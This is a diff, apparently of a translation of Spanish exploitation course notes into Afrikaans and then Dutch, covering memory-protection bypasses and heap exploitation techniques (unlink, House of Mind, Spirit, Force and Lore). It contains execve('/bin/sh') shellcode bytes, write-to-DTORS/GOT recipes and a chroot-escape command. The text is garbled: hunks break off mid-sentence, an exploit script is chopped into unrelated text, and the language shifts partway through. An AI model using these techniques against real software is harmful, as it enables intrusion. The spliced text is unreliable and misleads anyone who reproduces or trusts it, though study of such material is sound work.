now** +Ten spyte hiervan is programme in die algemeen nie gekompliseer met hierdie opsies nie, dus bly hierdie aanvalle moontlik. -A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. +**readelf -l /proc/ID_PROC/exe | grep BIND_NOW** -> Om te bepaal of BIND_NOW gebruik word -**readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW +**Fortify Source -D_FORTIFY_SOURCE=1 of =2** -**Fortify Source -D\_FORTIFY\_SOURCE=1 o =2** +Probeer om funksies te identifiseer wat onveilig kopieer van die een plek na die ander en vervang die funksie met 'n veilige funksie. -Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. +Byvoorbeeld:\ +char buf[16];\ +strcpy(buf, source); -Por ej:\ -char buf\[16];\ -strcpy(but, source); +Dit identifiseer dit as onveilig en vervang dan strcpy() met \_\_strcpy\_chk() deur die grootte van die buffer as die maksimum kopieergrootte te gebruik. -La identifica como insegura y entonces cambia strcpy() por \_\_strcpy\_chk() utilizando el tamaño del buffer como tamaño máximo a copiar. +Die verskil tussen **=1** en **=2** is dat: -La diferencia entre **=1** o **=2** es que: +Die tweede staan nie toe dat **%n** van 'n afdeling met skryfregte kom nie. Verder kan die parameter vir direkte toegang tot argumente slegs gebruik word as die vorige gebruik is, dit wil sê, slegs **%3$d** kan gebruik word as **%2$d** en **%1$d** voorheen gebruik is. -La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d** +Om die foutboodskap te wys, word argv[0] gebruik, dus as dit die adres van 'n ander plek (soos 'n globale veranderlike) bevat, sal die foutboodskap die inhoud van daardie veranderlike wys. Bl. 191 -Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el la dirección de otro sitio (como una variable global) el mensaje de error mostrará el contenido de dicha variable. Pag 191 +**Vervanging van Libsafe** -**Reemplazo de Libsafe** +Dit word geaktiveer met: LD_PRELOAD=/lib/libsafe.so.2\ +of\ +"/lib/libsave.so.2" > /etc/ld.so.preload -Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\ -o\ -“/lib/libsave.so.2” > /etc/ld.so.preload - -Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid). +Dit onderskep oproepe na sekere onveilige funksies met veilige funksies. Dit is nie gestandaardiseer nie. (slegs vir x86, nie vir samestellings met -fomit-frame-pointer, nie statiese samestellings nie, nie alle kwesbare funksies word veilig gemaak nie, en LD_PRELOAD werk nie vir binêre lêers met suid nie). **ASCII Armored Address Space** -Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian. +Dit behels die laai van gedeelde biblioteke vanaf 0x00000000 tot 0x00ffffff sodat daar altyd 'n 0x00 byte is. Dit stop egter baie min aanvalle, veral in little endian. **ret2plt** -Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la plt) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar (system()). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system()… Al final se llama la dirección guardada en GOT que será system() +Dit behels die uitvoering van 'n ROP (Return-Oriented Programming) sodat die strcpy@plt-funksie (van die plt) geroep word en dit wys na die inskrywing in die GOT en die eerste byte van die funksie wat geroep moet word (system()) gekopieer word. Dan word dieselfde proses gevolg vir GOT+1 en die tweede byte van system() word gekopieer... Uiteindelik word die adres wat in die GOT gestoor is, wat system() sal wees, geroep. -**Falso EBP** +**False EBP** -Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system() se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”. +Vir funksies wat EBP gebruik as 'n register om na die argumente te wys, moet die EBP ook verander word om na 'n geheuegebied te wys wat enige twee willekeurige bytes bevat en dan die adres van &"/bin/sh". -**Jaulas con chroot()** +**Chroot-kluise** -debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico +debootstrap -arch=i386 hardy /home/user -> Installeer 'n basiese stelsel in 'n spesifieke subgids -Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. +'n Administrateur kan uit een van hierdie kluise ontsnap deur mkdir foo; chroot foo; cd .. te doen. -**Instrumentación de código** +**Kode-instrumentasie** -Valgrind —> Busca errores\ +Valgrind -> Soek na foute\ Memcheck\ RAD (Return Address Defender)\ Insure++ -## **8 Heap Overflows: Exploits básicos** +## **8 Heap-oorvloei: Basiese aanvalle** -**Trozo asignado** +**Toegewysde stuk** -prev\_size |\ -size | —Cabecera\ -\*mem | Datos +prev_size |\ +size | -Kop\ +\*mem | Data -**Trozo libre** +**Vry stuk** -prev\_size |\ +prev_size |\ size |\ -\*fd | Ptr forward chunk\ -\*bk | Ptr back chunk —Cabecera\ -\*mem | Datos +\*fd | Wysiger na volgende stuk\ +\*bk | Wysiger na vorige stuk -Kop\ +\*mem | Data -Los trozos libres están en una lista doblemente enlazada (bin) y nunca pueden haber dos trozos libres juntos (se juntan) +Die vry stukke is in 'n dubbelgekoppelde lys (bin) en daar mag nooit twee aangrensende vry stukke wees nie (hulle word saamgevoeg). -En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap() y si el trozo pertenece al arena primario. +In "size" is daar bits om aan te dui: Of die vorige stuk in gebruik is, of die stuk toegewys is deur middel van mmap() en of die stuk behoort tot die primêre arena. -Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink() y se pasa el nuevo trozo más grande a frontlink() para que le inserte el bin adecuado. +As 'n stuk vrygemaak word en een van die aangrensende stukke is vry, word hulle saamgevoeg deur die unlink() makro en die nuwe grootste stuk word na frontlink() gestuur om dit in die toepaslike bin in te voeg. unlink(){\ -BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk\ -BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\ +BK = P->bk; -> Die BK van die nuwe stuk is die een wat die vorige vry stuk gehad het\ +FD = P->fd; -> Die FD van die nuwe stuk is die een wat die vorige vry stuk gehad het\ +FD->bk = BK; -> Die BK van die volgende stuk wys na die nuwe stuk\ +BK->fd = FD; -> Die FD van die vorige stuk wys na die nuwe stuk\ } -Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: +Dus as ons die P->bk kan verander na die adres van 'n shellcode en die P->fd na die adres van 'n inskrywing in die GOT of DTORS minus 12, word die volgende bereik: -BK = P->bk = \&shellcode\ -FD = P->fd = &\_\_dtor\_end\_\_ - 12\ -FD->bk = BK -> \*((&\_\_dtor\_end\_\_ - 12) + 12) = \&shellcode +BK = P->bk = &shellcode\ +FD = P->fd = &__dtor_end__ - 12\ +FD->bk = BK -> *((&__dtor_end__ - 12) + 12) = &shellcode -Y así se se ejecuta al salir del programa la shellcode. +En dus sal die shellcode uitgevoer word wanneer die program afsluit. -Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: +Verder skryf die 4de instruksie van unlink() iets en die shellcode moet hiervoor aangepas word: -BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor\_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. +BK->fd = FD -> *((&shellcode + 8) = (&__dtor_end__ - 12) -> Dit veroorsaak die skryf van 4 byte vanaf die 8ste byte van die shellcode af, dus moet die eerste instruksie van die shellcode 'n jmp wees om hierdie te omseil en na 'n reeks nops te spring wat na die res van die shellcode lei. -Por lo tanto el exploit se crea: - -En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. - -Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. - -Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). - -**from struct import \*** - -**import os** - -**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12bytes de relleno** +Dus die aanval word so geskep: +In buffer1 plaas ons die shellcode beginnende met 'n jmp sodat dit na die nops of die res van die shellcode sal spring **shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\** **"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \\** **"\x80\xe8\xdc\xff\xff\xff/bin/sh";** -**prev\_size = pack("\ Devuelve un puntero a la dirección donde comienza el trozo (mem-8) +p = mem2chunk(mes); —> Gee 'n aanwysing na die adres waar die stuk begin (mem-8) … @@ -889,11 +877,11 @@ ar\_ptr = arena\_for\_chunk(p); —> chunk\_non\_main\_arena(ptr)?heap\_for\_ptr } -En \[1] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar\_ptr (como si fuese un struct heap\_info) +In \[1] word die size-veld en die NON\_MAIN\_ARENA-bit nagegaan, wat verander kan word sodat die toets waar is en heap\_for\_ptr() uitgevoer word. Dit doen 'n and met "mem" en stel die minst belangrike 2.5 byte op 0 (in ons geval van 0x0804a000 na 0x08000000) en kry toegang tot 0x08000000->ar\_ptr (asof dit 'n struct heap\_info is). -De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr(ptr)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr) +Op hierdie manier, as ons byvoorbeeld 'n stuk kan beheer in 0x0804a000 en 'n stuk in **0x081002a0** vrygestel word, kan ons na die adres 0x08100000 gaan en skryf wat ons wil, byvoorbeeld **0x0804a000**. Wanneer hierdie tweede stuk vrygestel word, sal dit vind dat heap\_for\_ptr(ptr)->ar\_ptr die waarde bevat wat ons in 0x08100000 geskryf het (want dit pas die and toe wat ons vroeër gesien het en kry die waarde van die eerste 4 byte, die ar\_ptr). -De esta forma se llama a \_int\_free(ar\_ptr, mem), es decir, **\_int\_free(0x0804a000, 0x081002a0)**\ +Op hierdie manier word \_int\_free(ar\_ptr, mem) geroep, dit wil sê, **\_int\_free(0x0804a000, 0x081002a0)**\ **\_int\_free(mstate av, Void\_t\* mem){**\ …\ bck = unsorted\_chunks(av);\ @@ -905,98 +893,87 @@ fwd->bk = p; ..} -Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. +Soos ons vroeër gesien het, kan ons die waarde van av beheer, want dit is wat ons in die vrygestelde stuk skryf. -Tal y como se define unsorted\_chunks, sabemos que:\ +Soos unsorted\_chunks gedefinieer word, weet ons dat:\ bck = \&av->bins\[2]-8;\ fwd = bck->fd = \*(av->bins\[2]);\ fwd->bk = \*(av->bins\[2] + 12) = p; -Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo. +Dus as ons die waarde van \_\_DTOR\_END\_\_-12 in av->bins\[2] skryf, sal dit uiteindelik in \_\_DTOR\_END\_\_ geskryf word as die adres van die tweede stuk. -Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2] +Met ander woorde, in die eerste stuk moet ons die adres van \_\_DTOR\_END\_\_-12 aan die begin plaas, want dit is waar av->bins\[2] dit sal kry. -En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr() piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] - -En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA - -A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode - -De esta forma se llamará a \_int\_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode. - -Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. - -Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él. +In die adres waar die adres van die tweede stuk met +Hierdie tegniek is nie meer toepaslik nie, want byna dieselfde pleister as vir unlink is toegepas. Dit vergelyk of die nuwe plek waarna dit wys, ook na hom wys. **Fastbin** -Es una variante de The house of mind +Dit is 'n variasie van The House of Mind. -nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free() +Ons wil die volgende kode uitvoer wat bereik word na die eerste toetsing van die \_int\_free() funksie: -fb = &(av->fastbins\[fastbin\_index(size)] —> Siendo fastbin\_index(sz) —> (sz >> 3) - 2 +fb = &(av->fastbins\[fastbin\_index(size)] —> Waar fastbin\_index(sz) —> (sz >> 3) - 2 -… +... p->fd = \*fb \*fb = p -De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir. +Op hierdie manier, as dit in "fb" geplaas word, gee dit die adres van 'n funksie in die GOT, en op hierdie adres sal die oorskryfde adres geplaas word. Hiervoor is dit nodig dat die arena naby die dtors-adresse is. Meer presies, av->max\_fast moet die adres wees wat ons gaan oorskryf. -Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. +Aangesien ons met The House of Mind gesien het dat ons die posisie van av beheer, as ons die grootteveld instel as 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() sal fastbins\[-1] teruggee, wat na av->max\_fast wys. -Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() nos devolverá fastbins\[-1], que apuntará a av->max\_fast +In hierdie geval sal av->max\_fast die oorskryfde adres wees (nie waarna dit wys nie, maar daardie posisie sal oorskryf word). -En este caso av->max\_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). +Dit moet ook voldoen dat die aangrensende stuk na die vrygestelde stuk groter as 8 moet wees -> Aangesien ons gesê het dat die grootte van die vrygestelde stuk 8 is, hoef ons net 'n groter grootte as 8 in hierdie valse stuk te plaas (aangesien die shellcode in die vrygestelde stuk sal wees, moet ons 'n jmp aan die begin plaas wat in nops val). -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). +Daarbenewens moet daardie valse stuk kleiner wees as av->system\_mem. av->system\_mem is 1848 byte verder. -Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá. +As gevolg van die nulle van \_DTOR\_END\_ en die min adres in die GOT, is geen van hierdie afdrukke geskik om oorskryf te word nie, so laat ons kyk hoe om fastbin toe te pas om die stoor aan te val. -Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. +'n Ander manier van aanval is om die **av** na die stoor te rig. -Otra forma de ataque es redirigir el **av** hacia la pila. +As ons die grootte verander sodat dit 16 in plaas van 8 is, dan sal fastbin\_index() fastbins\[0] teruggee en ons kan dit gebruik om die stoor te oorskryf. -Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. +Hiervoor mag daar geen kanaries of vreemde waardes in die stoor wees nie, ons moet eintlik hier wees: 4 nulbyte + EBP + RET -Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET +Die 4 nulbyte is nodig omdat die **av** na hierdie adres sal wys en die eerste element van 'n **av** die mutex is wat 0 moet wees. -Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. +Die **av->max\_fast** sal die EBP wees en dit sal 'n waarde wees wat ons sal gebruik om die beperkings te omseil. -El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. +In die **av->fastbins\[0]** sal dit oorskryf word met die adres van **p** en dit sal die RET wees, sodat dit na die shellcode sal spring. -En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. +Daarbenewens sal daar in **av->system\_mem** (1484 byte bo die posisie in die stoor) baie rommel wees wat ons sal toelaat om die toetsing wat gedoen word, te omseil. -Además, en **av->system\_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. - -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). +Daarbenewens moet daardie aangrensende stuk na die vrygestelde stuk groter as 8 wees -> Aangesien ons gesê het dat die grootte van die vrygestelde stuk 16 is, hoef ons net 'n groter grootte as 8 in hierdie valse stuk te plaas (aangesien die shellcode in die vrygestelde stuk sal wees, moet ons 'n jmp aan die begin plaas wat in nops val wat na die grootteveld van die nuwe valse stuk kom). **The House of Spirit** -En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). +In hierdie geval wil ons 'n aanpasbare malloc-aanwyser hê wat deur die aanvaller verander kan word (byvoorbeeld dat die aanwyser op die stoor onder 'n moontlike oorloop na 'n veranderlike is). -Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. +Op hierdie manier kan ons hierdie aanwyser na enige plek laat wys. Nie enige plek is egter geldig nie, die grootte van die valse stuk moet kleiner wees as av->max\_fast en spesifiek gelyk wees aan die grootte wat in 'n toekomstige oproep na malloc()+8 versoek word. Daarom, as ons weet dat na hierdie kwesbare aanwyser 'n oproep na malloc(40) gemaak word, moet die grootte van die valse stuk gelyk wees aan 48. -Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system\_mem. +As byvoorbeeld die program die gebruiker vra vir 'n nommer, kan ons 48 invoer en die aanpasbare malloc-aanwyser na die volgende 4 byte wys (wat dalk aan die EBP behoort, sodat die 48 agterblyf, asof dit die groottekop is). Daarbenewens moet die adres ptr-4+48 aan verskeie voorwaardes voldoen (in hierdie geval is ptr=EBP), dit wil sê, 8 < ptr-4+48 < av->system\_mem. -En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. +As dit voldoen word, wanneer die volgende malloc geroep word wat ons gesê het dat dit malloc(40) is, sal die adres as die EBP toegewys word. As die aanvaller ook die skryfwerk in hierdie malloc kan beheer, kan hy sowel die EBP as die EIP met die gewenste adres oorskryf. -Esto creo que es porque así cuando lo libere free() guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc() que se quiere reservar, así que le asigna esa dirección. +Ek dink dit is omdat wanneer dit vrygelaat word free(), sal dit onthou dat daar 'n stuk van die perfekte grootte vir die nuwe malloc() wat gereserveer wil word, in die adres wat na die EBP van die stoor wys, is, sodat dit daardie adres toewys. **The House of Force** -Es necesario: +Dit is nodig: -* Un overflow a un trozo que permita sobreescribir el wilderness -* Una llamada a malloc() con el tamaño definido por el usuario -* Una llamada a malloc() cuyos datos puedan ser definidos por el usuario +* 'n Oorloop na 'n stuk wat die wildernis kan oorskryf +* 'n Oproep na malloc() met die grootte wat deur die gebruiker gedefinieer word +* 'n Oproep na malloc() waarvan die data deur die gebruiker gedefinieer kan word -Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc() sin necesidad de expandir el heap +Die eerste ding wat gedoen word, is om die grootte van die wildernisstuk met 'n baie groot waarde (0xffffffff) te oorskryf, sodat enige geheueversoek groot genoeg in \_int\_malloc() hanteer sal word sonder om die heap uit te brei. -Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. +Die tweede is om av->top te verander sodat dit wys na 'n geheuegebied onder die beheer van die aanvaller, soos die stoor. In av->top word \&EIP - 8 geplaas. -Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el control del atacante: +Ons moet av->top oorskryf sodat dit wys na die geheuegebied onder die beheer van die aanvaller: victim = av->top; @@ -1004,98 +981,79 @@ remainder = chunck\_at\_offset(victim, nb); av->top = remainder; -Victim recoge el valor de la dirección del trozo wilderness actual (el actual av->top) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc(). Por lo que si \&EIP-8 está en 0xbffff224 y av->top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av->top quede apuntando a $EIP-8 para el próximo malloc() será: +Victim kry die waarde van die adres van die huidige wildernisstuk (die huidige av->top) en remainder is presies die som van daardie adres plus die aantal byte wat deur malloc() versoek word. Dus as \&EIP-8 in 0xbffff224 is en av->top 0x080c2788 bevat, sal die hoeveelheid wat ons moet reserweer in die beheerde malloc om av->top te laat wys na $EIP-8 vir die volgende malloc() wees: 0xbffff224 - 0x080c2788 = 3086207644. -Así se guardará en av->top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir. +Dit sal die gewysigde waarde in av->top stoor en die volgende malloc sal na die EIP wys en dit kan oorskryf. -Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc(). Es decir, si el wilderness está apuntando a \&EIP-8, el size quedará justo en el campo EBP del stack. +Dit is belangrik om te weet dat die grootte van die nuwe wildernisstuk groter moet wees as die versoek wat +Reserveer twee mallocs, zodat de eerste kan worden overlopen nadat de tweede is vrijgegeven en in zijn bin is geplaatst (dat wil zeggen, er is een malloc gereserveerd die groter is dan het tweede stuk voordat de overflow plaatsvindt). -**The House of Lore** +De malloc die wordt gegeven aan het door de aanvaller gekozen adres, wordt gecontroleerd door de aanvaller. -**Corrupción SmallBin** +Het doel is als volgt: als we een overflow kunnen veroorzaken naar een heap die een vrijgegeven stuk eronder heeft en in zijn bin zit, kunnen we de bk-pointer wijzigen. Als we de bk-pointer wijzigen en dit stuk het eerste in de bin-lijst wordt en wordt gereserveerd, zal de bin worden misleid en wordt gezegd dat het laatste stuk van de lijst (de volgende die wordt aangeboden) zich op het valse adres bevindt dat we hebben ingesteld (bijvoorbeeld op de stack of GOT). Dus als er een ander stuk wordt gereserveerd en de aanvaller er machtigingen op heeft, wordt er een stuk gegeven op de gewenste positie en kan erin worden geschreven. -Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. +Na het vrijgeven van het gewijzigde stuk is het nodig om een groter stuk te reserveren dan het vrijgegeven stuk, zodat het gewijzigde stuk uit de unsorted bins komt en in zijn bin wordt geplaatst. -Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast (72normalmente) y menos a MIN\_LARGE\_SIZE (512). +Eenmaal in zijn bin is het tijd om de bk-pointer te wijzigen met behulp van de overflow, zodat deze wijst naar het adres dat we willen overschrijven. -Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: +Dus de bin moet wachten tot er voldoende keren naar malloc() wordt gebeld, zodat de gewijzigde bin opnieuw wordt gebruikt en de bin wordt misleid om te geloven dat het volgende stuk zich op het valse adres bevindt. En vervolgens wordt het gewenste stuk gegeven. -bck = victim->bk; Apunta al trozo anterior, es la única info que podemos alterar. +Om de kwetsbaarheid zo snel mogelijk uit te voeren, zou het ideaal zijn: Reservering van het kwetsbare stuk, reservering van het stuk dat zal worden gewijzigd, dit stuk wordt vrijgegeven, een groter stuk wordt gereserveerd dan het stuk dat zal worden gewijzigd, het stuk wordt gewijzigd (kwetsbaarheid), een stuk van dezelfde grootte als het aangetaste stuk wordt gereserveerd en een tweede stuk van dezelfde grootte wordt gereserveerd en dit zal wijzen naar het gekozen adres. -bin->bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección +Om deze aanval te beschermen, wordt de gebruikelijke controle gebruikt om te controleren of het stuk "niet" vals is: wordt gecontroleerd of bck->fd naar victim wijst. Met andere woorden, in ons geval, als de fd-pointer van het valse stuk dat op de stack wordt aangewezen naar victim wijst. Om deze bescherming te omzeilen, moet de aanvaller op de een of andere manier in staat zijn om op het juiste adres (waarschijnlijk op de stack) het adres van victim te schrijven. Zodat het eruitziet als een echt stuk. -bck->fd = bin; Se cierra la lista haciendo que este apunte a bin +**Corruptie van LargeBin** -Se necesita: +Dezelfde vereisten als voorheen zijn nodig, plus de gereserveerde stukken moeten groter zijn dan 512. -Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin (es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow) +De aanval is vergelijkbaar met de vorige, dat wil zeggen, het wijzigen van de bk-pointer en al die oproepen naar malloc() zijn nodig, maar daarnaast moet de grootte van het gewijzigde stuk worden gewijzigd, zodat size - nb < MINSIZE. -Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante. +Bijvoorbeeld, stel size in op 1552 zodat 1552 - 1544 = 8 < MINSIZE (de aftrek kan niet negatief zijn omdat een unsigned wordt vergeleken). -El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista (el siguiente en ofrecer) está en la dirección falsa que hayamos puesto (al stack o GOT por ejemplo). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella. - -Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin. - -Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir. - -Así el bin deberá esperar turno a que se llame a malloc() suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa. - -Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo (vulnerabilidad), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida. - -Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck->fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma (por el stack probablemente) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero. - -**Corrupción LargeBin** - -Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512. - -El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc(), pero además hay que modificar el size del trozo 